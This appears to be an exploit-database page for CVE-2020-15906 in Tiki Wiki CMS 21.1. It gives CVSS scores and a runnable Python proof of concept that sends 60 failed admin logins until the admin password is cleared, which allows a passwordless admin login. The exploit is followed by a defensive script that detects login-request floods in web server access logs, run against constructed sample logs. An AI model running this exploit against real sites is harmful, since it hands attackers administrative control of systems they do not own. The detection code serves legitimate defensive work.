CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
83.1%
# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
# Date: 01.08.2020 (1st August 2020)
# Exploit Author: Maximilian Barz aka. Silky
# Vendor Homepage: tiki.org
# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
# Version: 21.1
# Tested on: Kali Linux 5.7.0-kali1-amd64
#!/usr/bin/env python3
import requests
import lxml.html
import sys

banner = '''
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
Proof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
'''

def main():
    if len(sys.argv) < 2:
        print(banner)
        print("Usage: %s <host> " % sys.argv[0])
        print("Eg: %s 1.2.3.4 " % sys.argv[0])
        return
    rhost = sys.argv[1]
    url = "http://" + rhost + "/tiki/tiki-login.php"
    # One session for the whole run: the anti-CSRF ticket has to be submitted
    # together with the session cookie that was set when the login page was fetched.
    session = requests.Session()

    def get_ticket():
        # Fetch the login page through the session (this also stores the cookie)
        # and pull the hidden "ticket" field out of the login form.
        r = session.get(url)
        html = lxml.html.fromstring(r.text)
        auth = html.xpath('//input[@name="ticket"]/@value')
        return auth[0] if auth else ''

    ticket = get_ticket()
    # Deliberately wrong password for admin: the bug is triggered by repeated
    # failed login attempts, not by guessing the real password.
    payload = {'ticket': ticket, 'user': 'admin', 'pass': 'test', 'login': '',
               'stay_in_ssl_mode_present': 'y', 'stay_in_ssl_mode': 'n'}
    headers = {
        'Host': rhost,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Referer': 'http://' + rhost + '/tiki/tiki-login.php',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0',
    }
    # Content-Length is computed by requests from the encoded body; a hard-coded
    # value copied from a captured request would be wrong for other host names.
    for i in range(60):
        # data= and headers= must be keyword arguments: passed positionally, the
        # header dict would be handed to Session.post() as the json= body.
        r = session.post(url, data=payload, headers=headers)
        if "Account requires administrator approval." in r.text:
            print("Admin password got removed after %d failed login attempts." % (i + 1))
            print("Use Burp Suite (or a browser) to log in as admin without a password.")
            break
    else:
        print("Marker not seen after 60 attempts; target may be patched or use a different path.")

if __name__ == '__main__':
    main()
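The PoC above triggers the bug purely by volume: it posts 60 failed "admin" logins to /tiki/tiki-login.php from one client and waits for the "Account requires administrator approval." marker. That burst is also the thing to alert on. The following detection is an added example written for this page, not part of the exploit-db entry or of Tiki itself. It assumes Apache/nginx combined-format access logs, the same /tiki/tiki-login.php path the PoC uses, and an alert threshold of 20 POSTs per source in a 5-minute sliding window (a tuning assumption; any threshold well below the PoC's 60 catches it). The log lines are constructed inline for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/tiki/tiki-login.php"   # path used by the PoC above


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop any query string
        "status": int(m["status"]),
    }


def find_login_floods(lines, threshold=20, window=timedelta(minutes=5),
                      login_path=LOGIN_PATH):
    """Return {ip: peak_count} for sources that POSTed to the login page at
    least `threshold` times inside any `window`-long sliding interval."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])

    alerts = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):
            # Slide the window start forward until it spans at most `window`.
            while t - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


def build_sample_log():
    """Constructed sample: one source replaying the PoC (60 POSTs one second
    apart) plus a second source with ordinary traffic. Not real log data."""
    base = datetime(2020, 8, 1, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 "-" "Mozilla/5.0"'
    lines = []
    for i in range(60):
        lines.append(fmt.format(ip="203.0.113.7",
                                ts=(base + timedelta(seconds=i)).strftime(TS_FMT),
                                method="POST", path=LOGIN_PATH, status=302))
    for i in range(3):
        lines.append(fmt.format(ip="198.51.100.4",
                                ts=(base + timedelta(minutes=i)).strftime(TS_FMT),
                                method="POST", path=LOGIN_PATH, status=302))
    lines.append(fmt.format(ip="198.51.100.4", ts=base.strftime(TS_FMT),
                            method="GET", path="/tiki/tiki-index.php", status=200))
    return lines


if __name__ == "__main__":
    for ip, count in find_login_floods(build_sample_log()).items():
        print("ALERT: %s sent %d login POSTs to %s within 5 minutes" % (ip, count, LOGIN_PATH))
```

The rule keys on request count rather than status code because a failed Tiki login and a successful one can both answer with a redirect; what distinguishes the attack is the rate from a single source. Feed real logs in with `find_login_floods(open(path))` and tune `threshold` to the site's normal login volume.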